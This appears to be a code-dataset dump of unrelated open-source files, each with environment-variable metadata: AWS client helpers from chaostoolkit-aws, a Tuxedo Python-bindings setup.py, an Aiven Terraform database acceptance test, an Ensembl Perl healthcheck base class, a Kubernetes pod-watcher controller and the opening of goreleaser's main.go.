creds["aws_secret_access_key"] = secrets.get("aws_secret_access_key")
creds["aws_session_token"] = secrets.get("aws_session_token")
return creds
def aws_client(resource_name: str, configuration: Configuration = None,
secrets: Secrets = None):
"""
Create a boto3 client for the given resource.
You may pass the `aws_region` key in the `configuration` object to
be explicit about which region you want to use.
You may pass `aws_profile_name` value to the `configuration` object so that
we load the appropriate profile to converse with the AWS services. In that
case, make sure your local `~/.aws/credentials` config is properly set up, as
per https://boto3.readthedocs.io/en/latest/guide/configuration.html#aws-config-file
Also, if you want to assume a role, you should setup that file as per
https://boto3.readthedocs.io/en/latest/guide/configuration.html#assume-role-provider
as we do not read those settings from the `secrets` object.
""" # noqa: E501
configuration = configuration or {}
aws_profile_name = configuration.get("aws_profile_name")
aws_assume_role_arn = configuration.get("aws_assume_role_arn")
params = get_credentials(secrets)
region = configuration.get("aws_region")
if not region:
logger.debug(
"The configuration key `aws_region` is not set, looking in the "
"environment instead for `AWS_REGION` or `AWS_DEFAULT_REGION`")
region = os.getenv("AWS_REGION", os.getenv("AWS_DEFAULT_REGION"))
if not region:
raise InterruptExecution("AWS requires a region to be set!")
if region:
logger.debug("Using AWS region '{}'".format(region))
params["region_name"] = region
if boto3.DEFAULT_SESSION is None:
# we must create our own session so that we can populate the profile
# name when it is provided. Only create the default session once.
boto3.setup_default_session(profile_name=aws_profile_name, **params)
if not aws_assume_role_arn:
logger.debug(
"Client will be using profile '{}' from boto3 session".format(
aws_profile_name or "default"))
return boto3.client(resource_name, **params)
else:
logger.debug(
"Fetching credentials dynamically assuming role '{}'".format(
aws_assume_role_arn))
aws_assume_role_session_name = configuration.get(
"aws_assume_role_session_name")
if not aws_assume_role_session_name:
aws_assume_role_session_name = "ChaosToolkit"
logger.debug(
"You are missing the `aws_assume_role_session_name` "
"configuration key. A unique one was generated: '{}'".format(
aws_assume_role_session_name))
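# exchange the base credentials for temporary credentials of the assumed role via STS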
client = boto3.client('sts', **params)
params = {
"RoleArn": aws_assume_role_arn,
"RoleSessionName": aws_assume_role_session_name
}
response = client.assume_role(**params)
creds = response['Credentials']
logger.debug(
"Temporary credentials will expire on {}".format(
creds["Expiration"].isoformat()))
params = {
"aws_access_key_id": creds['AccessKeyId'],
"aws_secret_access_key": creds['SecretAccessKey'],
"aws_session_token": creds['SessionToken']
}
if region:
params["region_name"] = region
return boto3.client(resource_name, **params)
def signed_api_call(service: str, path: str = "/", method: str = 'GET',
configuration: Configuration = None,
secrets: Secrets = None,
params: Dict[str, Any] = None) -> requests.Response:
"""
Perform an API call against an AWS service.
This should only be used when boto does not already implement the service
itself. See https://boto3.readthedocs.io/en/latest/reference/services/index.html
for a list of supported services by boto. This function does not claim
being generic enough to support the whole range of AWS API.
The `configuration` object should look like this:
```json
{
"aws_region": "us-east-1",
"aws_host": "amazonaws.com"
}
```
While both are optional, and default to the values shown in this snippet,
you should make sure to be explicit about them to avoid confusion.
The endpoint being called is built from the given `service` name, the
given region and host as well as the `path` of the action being called on
the service. By default, the call is made over `HTTPS` but this can be
changed by setting `aws_endpoint_scheme` in the configuration dictionary.
Pass any parameters of the API itself via the remaining `params`
parameter, which is a dictionary. It should match the signature of the service
you are trying to call and will be sent as a query-string when `method` is
`"GET"` or `"DELETE"`, or as a JSON payload otherwise. Refer to the AWS
documentation for each service type.
This function does not support profile names so you must provide the
credentials in secrets.
""" # noqa: E501
configuration = configuration or {}
region = configuration.get("aws_region", "us-east-1") or ""
host = configuration.get("aws_host", "amazonaws.com")
scheme = configuration.get("aws_endpoint_scheme", "https")
host = "{s}.{r}.{h}".format(s=service, r=region, h=host)
endpoint = configuration.get(
"aws_endpoint", '{scheme}://{h}'.format(
scheme=scheme, h=host)).replace('..', '.')
endpoint = "{e}{p}".format(e=endpoint, p=path)
creds = get_credentials(secrets)
# when creds weren't provided via secrets, we let boto search for them
# from the process environment
if creds["aws_access_key_id"] and creds["aws_secret_access_key"]:
auth = AWSRequestsAuth(
aws_access_key=creds["aws_access_key_id"],
aws_secret_access_key=creds["aws_secret_access_key"],
aws_host=host,
aws_region=region,
aws_service=service)
else:
auth = BotoAWSRequestsAuth(
aws_host=host,
aws_region=region,
aws_service=service)
headers = {
"Accept": "application/json"
}
if method in ('DELETE', 'GET'):
return requests.request(
method, endpoint, headers=headers, auth=auth, params=params)
return requests.request(
method, endpoint, headers=headers, auth=auth, json=params)
def discover(discover_system: bool = True) -> Discovery:
"""
Discover AWS capabilities from this extension as well as, if an AWS
configuration is available, some information about the AWS environment.
"""
logger.info("Discovering capabilities from chaostoolkit-aws")
discovery = initialize_discovery_result(
"chaostoolkit-aws", __version__, "aws")
discovery["activities"].extend(load_exported_activities())
return discovery
###############################################################################
# Private functions
###############################################################################
def load_exported_activities() -> List[DiscoveredActivities]:
"""
Extract metadata from actions and probes exposed by this extension.
"""
activities = []
activities.extend(discover_actions("chaosaws.ec2.actions"))
activities.extend(discover_probes("chaosaws.ec2.probes"))
activities.extend(discover_actions("chaosaws.ecs.actions"))
activities.extend(discover_probes("chaosaws.ecs.probes"))
activities.extend(discover_actions("chaosaws.iam.actions"))
activities.extend(discover_probes("chaosaws.iam.probes"))
activities.extend(discover_actions("chaosaws.eks.actions"))
activities.extend(discover_probes("chaosaws.eks.probes"))
activities.extend(discover_actions("chaosaws.elbv2.actions"))
activities.extend(discover_probes("chaosaws.elbv2.probes"))
activities.extend(discover_actions("chaosaws.asg.actions"))
activities.extend(discover_probes("chaosaws.asg.probes"))
activities.extend(discover_actions("chaosaws.awslambda.actions"))
activities.extend(discover_probes("chaosaws.awslambda.probes"))
activities.extend(discover_actions("chaosaws.cloudwatch.actions"))
activities.extend(discover_probes("chaosaws.cloudwatch.probes"))
activities.extend(discover_actions("chaosaws.rds.actions"))
activities.extend(discover_probes("chaosaws.rds.probes"))
activities.extend(discover_actions("chaosaws.elasticache.actions"))
activities.extend(discover_probes('chaosaws.elasticache.probes'))
activities.extend(discover_actions("chaosaws.emr.actions"))
activities.extend(discover_probes('chaosaws.emr.probes'))
activities.extend(discover_actions("chaosaws.route53.actions"))
activities.extend(discover_probes('chaosaws.route53.probes'))
return activities
| []
| []
| [
"AWS_DEFAULT_REGION",
"AWS_REGION"
]
| [] | ["AWS_DEFAULT_REGION", "AWS_REGION"] | python | 2 | 0 | |
setup.py | from setuptools import setup, Extension
from setuptools.command.build_ext import build_ext
import os
import sys
import setuptools
__name__ = 'tuxedo'
__version__ = '0.0.13'
class get_pybind_include(object):
"""Helper class to determine the pybind11 include path
The purpose of this class is to postpone importing pybind11
until it is actually installed, so that the ``get_include()``
method can be invoked. """
def __init__(self, user=False):
self.user = user
def __str__(self):
import pybind11
return pybind11.get_include(self.user)
ext_modules = [
Extension(
'tuxedo',
['src/tuxedo.cpp'],
include_dirs=[
os.path.join(os.environ['TUXDIR'], 'include'),
# Path to pybind11 headers
get_pybind_include(),
get_pybind_include(user=True),
],
library_dirs=[os.path.join(os.environ['TUXDIR'], 'lib')],
libraries=['tux', 'fml32', 'tmib', 'engine'],
language='c++'
),
]
# As of Python 3.6, CCompiler has a `has_flag` method.
# cf http://bugs.python.org/issue26689
def has_flag(compiler, flagname):
"""Return a boolean indicating whether a flag name is supported on
the specified compiler.
"""
import tempfile
with tempfile.NamedTemporaryFile('w', suffix='.cpp') as f:
f.write('int main (int argc, char **argv) { return 0; }')
try:
compiler.compile([f.name], extra_postargs=[flagname])
except setuptools.distutils.errors.CompileError:
return False
return True
def cpp_flag(compiler):
"""Return the -std=c++[11/14/17] compiler flag.
The newer version is preferred over c++11 (when it is available).
"""
flags = ['-std=c++17', '-std=c++14', '-std=c++11']
for flag in flags:
if has_flag(compiler, flag): return flag
raise RuntimeError('Unsupported compiler -- at least C++11 support '
'is needed!')
class BuildExt(build_ext):
"""A custom build extension for adding compiler-specific options."""
def build_extensions(self):
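# select compiler-specific compile and link flags before delegating to the default build_ext implementation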
ct = self.compiler.compiler_type
opts = []
link_opts = []
if ct == 'unix':
opts.append('-DVERSION_INFO="%s"' % self.distribution.get_version())
opts.append(cpp_flag(self.compiler))
if has_flag(self.compiler, '-fvisibility=hidden'):
opts.append('-fvisibility=hidden')
elif ct == 'msvc':
opts.append('/EHsc')
opts.append('/DVERSION_INFO=\\"%s\\"' % self.distribution.get_version())
tuxdir = os.environ['TUXDIR']
#cl /MD -I"%TUXDIR%"\include -Fea BS-23b8.c a.c "%TUXDIR%"\lib\libtux.lib "%TUXDIR%"\lib\libbuft.lib "%TUXDIR%"\lib\libfml.lib "%TUXDIR%"\lib\libfml32.lib "%TUXDIR%"\lib\libengine.lib wsock32.lib kernel32.lib advapi32.lib user32.lib gdi32.lib comdlg32.lib winspool.lib -link /MANIFEST -implib:BS-23b8.lib
link_opts = [
os.path.join(tuxdir, 'lib', 'libtux.lib'),
os.path.join(tuxdir, 'lib', 'libbuft.lib'),
os.path.join(tuxdir, 'lib', 'libfml.lib'),
os.path.join(tuxdir, 'lib', 'libfml32.lib'),
os.path.join(tuxdir, 'lib', 'libengine.lib'),
os.path.join(tuxdir, 'lib', 'libtmib.lib'),
'wsock32.lib',
'kernel32.lib',
'advapi32.lib',
'user32.lib',
'gdi32.lib',
'comdlg32.lib',
'winspool.lib',
'/MANIFEST'
]
for ext in self.extensions:
ext.extra_compile_args = opts
ext.extra_link_args = link_opts
if ct == 'msvc': ext.libraries = []
build_ext.build_extensions(self)
setup(
name=__name__,
version=__version__,
author='Aivars Kalvans',
author_email='[email protected]',
url='https://github.com/aivarsk/tuxedo-python',
description='Python3 bindings for writing Oracle Tuxedo clients and servers',
long_description=open('README.rst').read(),
ext_modules=ext_modules,
install_requires=['pybind11>=2.4'],
setup_requires=['pybind11>=2.4'],
cmdclass={'build_ext': BuildExt},
classifiers=[
'Programming Language :: Python :: 3',
'Programming Language :: C++',
'Operating System :: POSIX',
'Operating System :: Microsoft :: Windows',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development',
],
zip_safe=False,
)
| []
| []
| [
"TUXDIR"
]
| [] | ["TUXDIR"] | python | 1 | 0 | |
aiven/resource_database_test.go | package aiven
import (
"fmt"
"github.com/aiven/aiven-go-client"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/acctest"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/resource"
"github.com/hashicorp/terraform-plugin-sdk/v2/terraform"
"os"
"testing"
)
func init() {
resource.AddTestSweepers("aiven_database", &resource.Sweeper{
Name: "aiven_database",
F: sweepDatabases,
Dependencies: []string{
"aiven_connection_pool",
},
})
}
func sweepDatabases(region string) error {
client, err := sharedClient(region)
if err != nil {
return fmt.Errorf("error getting client: %s", err)
}
conn := client.(*aiven.Client)
projects, err := conn.Projects.List()
if err != nil {
return fmt.Errorf("error retrieving a list of projects : %s", err)
}
for _, project := range projects {
if project.Name == os.Getenv("AIVEN_PROJECT_NAME") {
services, err := conn.Services.List(project.Name)
if err != nil {
return fmt.Errorf("error retrieving a list of services for a project `%s`: %s", project.Name, err)
}
for _, service := range services {
dbs, err := conn.Databases.List(project.Name, service.Name)
if err != nil {
if err.(aiven.Error).Status == 403 || err.(aiven.Error).Status == 501 {
continue
}
return fmt.Errorf("error retrieving a list of databases for a service `%s`: %s", service.Name, err)
}
for _, db := range dbs {
if db.DatabaseName == "defaultdb" {
continue
}
err = conn.Databases.Delete(project.Name, service.Name, db.DatabaseName)
if err != nil {
return fmt.Errorf("error destroying database `%s` during sweep: %s", db.DatabaseName, err)
}
}
}
}
}
return nil
}
func TestAccAivenDatabase_basic(t *testing.T) {
resourceName := "aiven_database.foo"
rName := acctest.RandStringFromCharSet(10, acctest.CharSetAlphaNum)
resource.ParallelTest(t, resource.TestCase{
PreCheck: func() { testAccPreCheck(t) },
ProviderFactories: testAccProviderFactories,
CheckDestroy: testAccCheckAivenDatabaseResourceDestroy,
Steps: []resource.TestStep{
{
Config: testAccDatabaseResource(rName),
Check: resource.ComposeTestCheckFunc(
testAccCheckAivenDatabaseAttributes("data.aiven_database.database"),
resource.TestCheckResourceAttr(resourceName, "project", os.Getenv("AIVEN_PROJECT_NAME")),
resource.TestCheckResourceAttr(resourceName, "service_name", fmt.Sprintf("test-acc-sr-%s", rName)),
resource.TestCheckResourceAttr(resourceName, "database_name", fmt.Sprintf("test-acc-db-%s", rName)),
resource.TestCheckResourceAttr(resourceName, "termination_protection", "false"),
),
},
{
Config: testAccDatabaseTerminationProtectionResource(rName),
PreventPostDestroyRefresh: true,
ExpectNonEmptyPlan: true,
PlanOnly: true,
Check: resource.ComposeTestCheckFunc(
resource.TestCheckResourceAttr(resourceName, "project", os.Getenv("AIVEN_PROJECT_NAME")),
resource.TestCheckResourceAttr(resourceName, "service_name", fmt.Sprintf("test-acc-sr-%s", rName)),
resource.TestCheckResourceAttr(resourceName, "database_name", fmt.Sprintf("test-acc-db-%s", rName)),
resource.TestCheckResourceAttr(resourceName, "termination_protection", "true"),
),
},
},
})
}
func testAccCheckAivenDatabaseResourceDestroy(s *terraform.State) error {
c := testAccProvider.Meta().(*aiven.Client)
// loop through the resources in state, verifying each database is destroyed
for _, rs := range s.RootModule().Resources {
if rs.Type != "aiven_database" {
continue
}
projectName, serviceName, databaseName := splitResourceID3(rs.Primary.ID)
db, err := c.Databases.Get(projectName, serviceName, databaseName)
if err != nil {
if err.(aiven.Error).Status != 404 {
return err
}
}
if db != nil {
return fmt.Errorf("database (%s) still exists", rs.Primary.ID)
}
}
return nil
}
func testAccDatabaseResource(name string) string {
return fmt.Sprintf(`
data "aiven_project" "foo" {
project = "%s"
}
resource "aiven_service" "bar" {
project = data.aiven_project.foo.project
cloud_name = "google-europe-west1"
plan = "startup-4"
service_name = "test-acc-sr-%s"
service_type = "pg"
maintenance_window_dow = "monday"
maintenance_window_time = "10:00:00"
pg_user_config {
pg_version = 11
public_access {
pg = true
prometheus = false
}
pg {
idle_in_transaction_session_timeout = 900
}
}
}
resource "aiven_database" "foo" {
project = aiven_service.bar.project
service_name = aiven_service.bar.service_name
database_name = "test-acc-db-%s"
}
data "aiven_database" "database" {
project = aiven_database.foo.project
service_name = aiven_database.foo.service_name
database_name = aiven_database.foo.database_name
depends_on = [aiven_database.foo]
}
`, os.Getenv("AIVEN_PROJECT_NAME"), name, name)
}
func testAccDatabaseTerminationProtectionResource(name string) string {
return fmt.Sprintf(`
data "aiven_project" "foo" {
project = "%s"
}
resource "aiven_service" "bar" {
project = data.aiven_project.foo.project
cloud_name = "google-europe-west1"
plan = "startup-4"
service_name = "test-acc-sr-%s"
service_type = "pg"
maintenance_window_dow = "monday"
maintenance_window_time = "10:00:00"
pg_user_config {
pg_version = 11
public_access {
pg = true
prometheus = false
}
pg {
idle_in_transaction_session_timeout = 900
}
}
}
resource "aiven_database" "foo" {
project = aiven_service.bar.project
service_name = aiven_service.bar.service_name
database_name = "test-acc-db-%s"
termination_protection = true
}
data "aiven_database" "database" {
project = aiven_database.foo.project
service_name = aiven_database.foo.service_name
database_name = aiven_database.foo.database_name
depends_on = [aiven_database.foo]
}
`, os.Getenv("AIVEN_PROJECT_NAME"), name, name)
}
func testAccCheckAivenDatabaseAttributes(n string) resource.TestCheckFunc {
return func(s *terraform.State) error {
r := s.RootModule().Resources[n]
a := r.Primary.Attributes
if a["project"] == "" {
return fmt.Errorf("expected to get a project name from Aiven")
}
if a["service_name"] == "" {
return fmt.Errorf("expected to get a service_name from Aiven")
}
if a["database_name"] == "" {
return fmt.Errorf("expected to get a database_name from Aiven")
}
if a["database_name"] == "" {
return fmt.Errorf("expected to get a database_name from Aiven")
}
return nil
}
}
| [
"\"AIVEN_PROJECT_NAME\"",
"\"AIVEN_PROJECT_NAME\"",
"\"AIVEN_PROJECT_NAME\"",
"\"AIVEN_PROJECT_NAME\"",
"\"AIVEN_PROJECT_NAME\""
]
| []
| [
"AIVEN_PROJECT_NAME"
]
| [] | ["AIVEN_PROJECT_NAME"] | go | 1 | 0 | |
src/org/ensembl/healthcheck/testcase/AbstractPerlBasedTestCase.java | /*
* Copyright [1999-2015] Wellcome Trust Sanger Institute and the EMBL-European Bioinformatics Institute
* Copyright [2016-2019] EMBL-European Bioinformatics Institute
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/**
* File: AbstractPerlBasedTestCase.java
* Created by: dstaines
* Created on: Nov 13, 2009
* CVS: $$
*/
package org.ensembl.healthcheck.testcase;
import java.util.Map;
import org.apache.commons.lang.StringUtils;
import org.ensembl.healthcheck.DatabaseRegistryEntry;
/**
* <p>
* Base class for invoking a perl script to carry out the test and parse the
* output.
* </p>
*
* @author dstaines
*
*/
public abstract class AbstractPerlBasedTestCase extends
AbstractShellBasedTestCase {
public static final String PERLOPTS = "perlopts";
public static final String PERL = "perl";
protected String PERL5LIB = null;
public String getPERL5LIB() {
return PERL5LIB;
}
public void setPERL5LIB(String pERL5LIB) {
PERL5LIB = pERL5LIB;
}
protected PerlScriptConfig config;
public PerlScriptConfig getConfig() {
if (config == null) {
config = new PerlScriptConfig(System.getProperty(PERL),
System.getProperty(PERLOPTS));
}
return config;
}
public void setConfig(PerlScriptConfig config) {
this.config = config;
}
public AbstractPerlBasedTestCase() {
// set PERL5LIB by default
String perl5Lib = System.getenv().get("PERL5LIB");
if (!StringUtils.isEmpty(perl5Lib)) {
setPERL5LIB(perl5Lib);
}
}
/**
* @return String perl script and relevant arguments to invoke with perl
* binary and options from
* {@link AbstractPerlBasedTestCase#getConfig()}
*/
protected abstract String getPerlScript(DatabaseRegistryEntry dbre,
int speciesId);
protected String createCommandLine(final DatabaseRegistryEntry dbre,
int speciesId) {
String commandLine = getPerlScript(dbre, speciesId);
if (getConfig() != null) {
if (!StringUtils.isEmpty(getConfig().getPerlBinary())) {
if (StringUtils.isEmpty(getConfig().getPerlOptions())) {
commandLine = config.getPerlBinary() + " " + commandLine;
} else {
commandLine = config.getPerlBinary() + " "
+ config.getPerlOptions() + " " + commandLine;
}
}
}
return commandLine;
}
protected Map<String,String> environmentVarsToSet() {
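// propagate PERL5LIB to the spawned process so the invoked perl script can locate its modules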
Map<String,String> inheritedEnvironment = super.environmentVarsToSet();
if(!StringUtils.isEmpty(getPERL5LIB())) {
inheritedEnvironment.put("PERL5LIB", getPERL5LIB());
}
return inheritedEnvironment;
}
}
| []
| []
| []
| [] | [] | java | 0 | 0 | |
pkg/controller/pod_watcher.go | /*
Copyright 2017 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package controller
import (
"context"
"fmt"
"os"
"time"
corev1 "k8s.io/api/core/v1"
v1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
utilruntime "k8s.io/apimachinery/pkg/util/runtime"
"k8s.io/apimachinery/pkg/util/wait"
coreinformers "k8s.io/client-go/informers/core/v1"
"k8s.io/client-go/kubernetes"
"k8s.io/client-go/kubernetes/scheme"
typedcorev1 "k8s.io/client-go/kubernetes/typed/core/v1"
corelisters "k8s.io/client-go/listers/core/v1"
"k8s.io/client-go/tools/cache"
"k8s.io/client-go/tools/record"
"k8s.io/client-go/util/workqueue"
"k8s.io/klog/v2"
"gitlab.com/4406arthur/mlaas_kubewatcher/pkg/reply"
"gitlab.com/4406arthur/mlaas_kubewatcher/pkg/webhook"
)
const controllerAgentName = "MLaasJobWatcher"
const (
// SuccessSynced is used as part of the Event 'reason' when a Foo is synced
SuccessSynced = "Synced"
// ErrResourceExists is used as part of the Event 'reason' when a Foo fails
// to sync due to a Deployment of the same name already existing.
ErrResourceExists = "ErrResourceExists"
// MessageResourceExists is the message used for Events when a resource
// fails to sync due to a Deployment already existing
MessageResourceExists = "Resource %q already exists and is not managed by Foo"
// MessageResourceSynced is the message used for an Event fired when a Foo
// is synced successfully
MessageResourceSynced = "Foo synced successfully"
)
// Controller is the controller implementation that watches Pod resources
type Controller struct {
// kubeclientset is a standard kubernetes clientset
kubeclientset kubernetes.Interface
podsLister corelisters.PodLister
podsSynced cache.InformerSynced
// workqueue is a rate limited work queue. This is used to queue work to be
// processed instead of performing it as soon as a change happens. This
// means we can ensure we only process a fixed amount of resources at a
// time, and makes it easy to ensure we are never processing the same item
// simultaneously in two different workers.
workqueue workqueue.RateLimitingInterface
// recorder is an event recorder for recording Event resources to the
// Kubernetes API.
recorder record.EventRecorder
controllerSDK *reply.ControllerSDK
}
// NewController returns a new pod watcher controller
func NewController(
kubeclientset kubernetes.Interface,
podInformer coreinformers.PodInformer,
controllerSDK *reply.ControllerSDK) *Controller {
klog.V(4).Info("Creating event broadcaster")
eventBroadcaster := record.NewBroadcaster()
eventBroadcaster.StartLogging(klog.Infof)
eventBroadcaster.StartRecordingToSink(&typedcorev1.EventSinkImpl{Interface: kubeclientset.CoreV1().Events("")})
recorder := eventBroadcaster.NewRecorder(scheme.Scheme, corev1.EventSource{Component: controllerAgentName})
controller := &Controller{
kubeclientset: kubeclientset,
podsLister: podInformer.Lister(),
podsSynced: podInformer.Informer().HasSynced,
workqueue: workqueue.NewNamedRateLimitingQueue(workqueue.DefaultControllerRateLimiter(), "watcher"),
recorder: recorder,
controllerSDK: controllerSDK,
}
klog.Info("Setting up event handlers")
// Set up an event handler for when Pod resources change. This
// handler will lookup the owner of the given Pod, and if it is
// owned by a Job will enqueue for processing.
podInformer.Informer().AddEventHandler(
cache.FilteringResourceEventHandler{
FilterFunc: func(obj interface{}) bool {
switch t := obj.(type) {
case *v1.Pod:
return checkPodLabel(t, os.Getenv("POD_CATEGORY"))
default:
return false
}
},
Handler: cache.ResourceEventHandlerFuncs{
UpdateFunc: func(old, new interface{}) {
newPod := new.(*corev1.Pod)
oldPod := old.(*corev1.Pod)
if newPod.ResourceVersion == oldPod.ResourceVersion {
// Periodic resync will send update events for all known Deployments.
// Two different versions of the same Deployment will always have different RVs.
return
}
controller.handleObject(new)
},
},
})
return controller
}
// Run will set up the event handlers for types we are interested in, as well
// as syncing informer caches and starting workers. It will block until stopCh
// is closed, at which point it will shutdown the workqueue and wait for
// workers to finish processing their current work items.
func (c *Controller) Run(threadiness int, stopCh <-chan struct{}) error {
defer utilruntime.HandleCrash()
defer c.workqueue.ShutDown()
// Wait for the caches to be synced before starting workers
klog.Info("Waiting for informer caches to sync")
if ok := cache.WaitForCacheSync(stopCh, c.podsSynced); !ok {
return fmt.Errorf("failed to wait for caches to sync")
}
klog.Info("Starting workers")
// Launch two workers to process
for i := 0; i < threadiness; i++ {
go wait.Until(c.runWorker, time.Second, stopCh)
}
klog.Info("Started workers")
<-stopCh
klog.Info("Shutting down workers")
return nil
}
// runWorker is a long-running function that will continually call the
// processNextWorkItem function in order to read and process a message on the
// workqueue.
func (c *Controller) runWorker() {
for c.processNextWorkItem() {
}
}
// processNextWorkItem will read a single work item off the workqueue and
// attempt to process it, by calling the syncHandler.
func (c *Controller) processNextWorkItem() bool {
obj, shutdown := c.workqueue.Get()
if shutdown {
return false
}
// We wrap this block in a func so we can defer c.workqueue.Done.
err := func(obj interface{}) error {
// We call Done here so the workqueue knows we have finished
// processing this item. We also must remember to call Forget if we
// do not want this work item being re-queued. For example, we do
// not call Forget if a transient error occurs, instead the item is
// put back on the workqueue and attempted again after a back-off
// period.
defer c.workqueue.Done(obj)
var key string
var ok bool
// We expect strings to come off the workqueue. These are of the
// form namespace/name. We do this as the delayed nature of the
// workqueue means the items in the informer cache may actually be
// more up to date that when the item was initially put onto the
// workqueue.
if key, ok = obj.(string); !ok {
// As the item in the workqueue is actually invalid, we call
// Forget here else we'd go into a loop of attempting to
// process a work item that is invalid.
c.workqueue.Forget(obj)
utilruntime.HandleError(fmt.Errorf("expected string in workqueue but got %#v", obj))
return nil
}
// Run the syncHandler, passing it the namespace/name string of the
// Pod resource to be synced.
if err := c.syncHandler(key); err != nil {
// Put the item back on the workqueue to handle any transient errors.
c.workqueue.AddRateLimited(key)
return fmt.Errorf("error syncing '%s': %s, requeuing", key, err.Error())
}
// Finally, if no error occurs we Forget this item so it does not
// get queued again until another change happens.
c.workqueue.Forget(obj)
klog.Infof("Successfully synced '%s'", key)
return nil
}(obj)
if err != nil {
utilruntime.HandleError(err)
return true
}
return true
}
// syncHandler compares the actual state with the desired, and attempts to
// converge the two; the business logic is injected here
func (c *Controller) syncHandler(key string) error {
// Convert the namespace/name string into a distinct namespace and name
namespace, name, err := cache.SplitMetaNamespaceKey(key)
if err != nil {
utilruntime.HandleError(fmt.Errorf("invalid resource key: %s", key))
return nil
}
// Get the pods resource with this namespace/name
pod, err := c.podsLister.Pods(namespace).Get(name)
if err != nil {
// The Pod resource may no longer exist, in which case we stop
// processing.
if errors.IsNotFound(err) {
utilruntime.HandleError(fmt.Errorf("Pod '%s' in work queue no longer exists", name))
return nil
}
return err
}
Status := pod.Status.Phase
Labels := pod.GetLabels()
jobName := Labels["job-name"]
if Status == "Succeeded" && pod.Status.ContainerStatuses[0].State.Terminated.ExitCode == int32(0) {
klog.Infof("job successfully terminated: '%v'", pod.GetName())
err = c.controllerSDK.Reply(jobName, true)
if err != nil {
klog.Infof("callback to controller failed: '%s'", err.Error())
}
if Labels["webhook-enable"] == "true" {
annotations, _ := getJobAnnotation(c.kubeclientset, jobName, namespace)
err = webhook.Callback(annotations["webhook-endpoint"], true, annotations["webhook-payload"])
if err != nil {
klog.Infof("webhook invoke failed: '%s'", err.Error())
}
}
}
if Status == "Failed" {
klog.Infof("job failed: '%v'", pod.GetName())
err = c.controllerSDK.Reply(jobName, false)
if err != nil {
klog.Infof("callback to controller failed: '%s'", err.Error())
}
//TODO: Send Mail
if Labels["webhook-enable"] == "true" {
annotations, _ := getJobAnnotation(c.kubeclientset, jobName, namespace)
err = webhook.Callback(annotations["webhook-endpoint"], false, annotations["webhook-payload"])
if err != nil {
klog.Infof("webhook invoke failed: '%s'", err.Error())
}
}
}
return nil
}
// enqueue takes a Pod resource and converts it into a namespace/name
// string which is then put onto the work queue. This method should *not* be
// passed resources of any type other than Pod.
func (c *Controller) enqueue(obj interface{}) {
var key string
var err error
if key, err = cache.MetaNamespaceKeyFunc(obj); err != nil {
utilruntime.HandleError(err)
return
}
c.workqueue.Add(key)
}
// handleObject will take any resource implementing metav1.Object and enqueue the
// corresponding Pod. If the Pod can no longer be found, the object is simply skipped.
func (c *Controller) handleObject(obj interface{}) {
var object metav1.Object
var ok bool
if object, ok = obj.(metav1.Object); !ok {
tombstone, ok := obj.(cache.DeletedFinalStateUnknown)
if !ok {
utilruntime.HandleError(fmt.Errorf("error decoding object, invalid type"))
return
}
object, ok = tombstone.Obj.(metav1.Object)
if !ok {
utilruntime.HandleError(fmt.Errorf("error decoding object tombstone, invalid type"))
return
}
klog.V(4).Infof("Recovered deleted object '%s' from tombstone", object.GetName())
}
klog.V(4).Infof("Processing object: %s", object.GetName())
pod, err := c.podsLister.Pods(object.GetNamespace()).Get(object.GetName())
if err != nil {
klog.V(4).Infof("ignoring orphaned object '%s' of '%s'", object.GetSelfLink(), object.GetName())
return
}
c.enqueue(pod)
return
// if ownerRef := metav1.GetControllerOf(object); ownerRef != nil {
// // If this object is not owned by job kind, we should not do anything more
// if ownerRef.Kind != "Job" {
// return
// }
// pod, err := c.podsLister.Pods(object.GetNamespace()).Get(object.GetName())
// if err != nil {
// klog.V(4).Infof("ignoring orphaned object '%s' of '%s'", object.GetSelfLink(), ownerRef.Name)
// return
// }
// c.enqueue(pod)
// return
// }
}
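// checkPodLabel reports whether the pod carries the category label this watcher
// is configured to track (see the POD_CATEGORY environment variable).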
func checkPodLabel(pod *v1.Pod, category string) bool {
if val, ok := pod.Labels["category"]; ok && val == category {
// check job-name label too, we have specfic nameing logic here
// jobLabel, exists := pod.Labels["job-name"]
// if exists && strings.Contains(jobLabel, ".") {
// return true
// }
return true
}
return false
}
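// getJobAnnotation fetches the parent Job by name and returns its annotations,
// which carry the webhook endpoint and payload settings.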
func getJobAnnotation(clientset kubernetes.Interface, jobName, namespace string) (map[string]string, error) {
job, err := clientset.BatchV1().Jobs(namespace).Get(context.TODO(), jobName, metav1.GetOptions{})
if err != nil {
return nil, err
}
return job.GetAnnotations(), nil
}
| [
"\"POD_CATEGORY\""
]
| []
| [
"POD_CATEGORY"
]
| [] | ["POD_CATEGORY"] | go | 1 | 0 | |
main.go | package main
import (
"fmt"
"io/ioutil"
"os"
"time"
"github.com/apex/log"
"github.com/apex/log/handlers/cli"
"github.com/caarlos0/ctrlc"
"github.com/fatih/color"
"github.com/goreleaser/goreleaser/internal/middleware"
"github.com/goreleaser/goreleaser/internal/pipe/defaults"
"github.com/goreleaser/goreleaser/internal/pipeline"
"github.com/goreleaser/goreleaser/internal/static"
"github.com/goreleaser/goreleaser/pkg/config"
"github.com/goreleaser/goreleaser/pkg/context"
"gopkg.in/alecthomas/kingpin.v2"
)
// nolint: gochecknoglobals
var (
version = "dev"
commit = ""
date = ""
builtBy = ""
)
type releaseOptions struct {
Config string
ReleaseNotes string
ReleaseHeader string
ReleaseFooter string
Snapshot bool
SkipPublish bool
SkipSign bool
SkipValidate bool
RmDist bool
Parallelism int
Timeout time.Duration
}
func main() {
// enable colored output on travis
if os.Getenv("CI") != "" {
color.NoColor = false
}
